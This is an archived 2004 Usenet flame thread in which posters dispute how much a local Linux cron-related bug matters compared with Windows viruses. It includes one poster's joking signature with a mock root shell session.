** If anybody knows for sure, give me your opinion ***********
| T.G.Reaper 2004-06-26, 1:54 pm |
On Fri, 25 Jun 2004 03:35:17 +0000, Ralph wrote:
> T.G.Reaper wrote:
>
> But the fact remains, on any system I
> administer, you would NOT be able to use cron.
Fine, when YOU administer every Linux system on the planet, get back to me.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| Jim Richardson 2004-06-26, 1:54 pm |
On Fri, 25 Jun 2004 06:18:34 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Fri, 25 Jun 2004 03:35:17 +0000, Ralph wrote:
>
> Fine, when YOU administer every Linux system on the planet, get back to me.
>
Funny, coming from the guy who admins a few MS-Windows machines, and
rabbits on about how secure they are, despite the millions of MS-Windows
machines that are anything but...
--
Jim Richardson http://www.eskimo.com/~warlock
Linux: The OS people choose without $200,000,000 of persuasion
T.G.Reaper wrote:
> On Fri, 25 Jun 2004 03:35:17 +0000, Ralph wrote:
>
> Fine, when YOU administer every Linux system on the planet, get back to
> me.
>
Listen, the bug you go on about is LAME. The MS virus thing is 100 times
worse. I can stop you from using your little bug with a couple of
configuration changes, that is IF you ever got onto one of my boxes to
begin with. The likelihood of the bug being a big problem is virtually NIL.
Even if I DON'T administer every machine, the current method of Linux
deployments is such that it would be very unlikely you would ever be
allowed to run code on any machine other than your own desktop. So you
crash your own desktop, BFD. Unless you can show a significant number of
Linux installs where the average user is running code on a production
server, the bug is only a problem for a few. Nothing at all compared to the
impact viruses have on MS users!
--
More Mutt nut logic: A person using a Linux embedded device is not a Linux
user!!!
Sorry Mutt nuts, but the only thing different with a Linux embedded device
is the user interface. The user is still using Linux, just with a different
UI.